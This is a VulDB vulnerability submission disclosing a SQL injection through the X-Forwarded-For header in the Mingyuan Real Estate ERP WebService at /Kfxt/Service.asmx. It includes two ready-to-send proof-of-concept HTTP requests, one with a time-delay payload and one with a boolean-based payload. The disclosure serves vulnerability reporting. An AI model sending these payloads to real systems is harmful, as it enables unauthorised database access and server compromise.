Submit #513708: Shenzhen Mingyuan Cloud Technology Co., Ltd. Mingyuan Real Estate ERP System v1.0 X-Forwarded-For Injection Vulnerabilityinfo

Title	Shenzhen Mingyuan Cloud Technology Co., Ltd. Mingyuan Real Estate ERP System v1.0 X-Forwarded-For Injection Vulnerability
Description	When the Mingyuan Real Estate ERP system WebService service verifies client IP permissions, it does not strictly filter and obtain the X-Forwarded-For real IP, resulting in a SQL injection vulnerability. Once an authenticated malicious attacker uses the SQL injection vulnerability to obtain information in the database (such as administrator background password, site user personal information), the attacker can even read commands to the server with high permissions to further obtain server system permissions. poc1: POST /Kfxt/Service.asmx HTTP/1.1 Host: User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate, br Accept: / Connection: keep-alive Content-Type: text/xml; charset=utf-8 X-Forwarded-For: 127.0.0.1');WAITFOR DELAY '0:0:5'-- SOAPAction: http://www.mysoft.com.cn/queryProjects Content-Length: 408 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <queryProjects xmlns="http://www.mysoft.com.cn/"> <inpXML><xml><buname>abc</buname></xml></inpXML> </queryProjects> </soap:Body> </soap:Envelope> poc2: POST /Kfxt/Service.asmx HTTP/1.1 Host: User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate, br Accept: / Connection: keep-alive Content-Type: text/xml; charset=utf-8 X-Forwarded-For: 127.0.0.1') AND 6994 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6994=6994) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(107)+CHAR(113))) AND ('MEuY'='MEuY SOAPAction: http://www.mysoft.com.cn/queryProjects Content-Length: 408 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <queryProjects xmlns="http://www.mysoft.com.cn/"> <inpXML><xml><buname>abc</buname></xml></inpXML> </queryProjects> </soap:Body> </soap:Envelope>
Source	⚠️ https://flowus.cn/share/fa5b99da-2e88-4efd-9266-ae8582782eaa?code=HC3R4E 【FlowUs 息流】Mingyuan Real Estate ERP System V1.0 X-Forwarded-For Injection Vulnerability
User	afish (UID 82290)
Submission	03/04/2025 03:46 (1 Year ago)
Moderation	03/15/2025 23:09 (12 days later)
Status	Accepted
VulDB entry	299825 [Shenzhen Mingyuan Cloud Technology Mingyuan Real Estate ERP System 1.0 HTTP Header /Kfxt/Service.asmx X-Forwarded-For sql injection]
Points	20

◂ Previous Overview Next ▸

Want to know what is going to be exploited?

We predict KEV entries!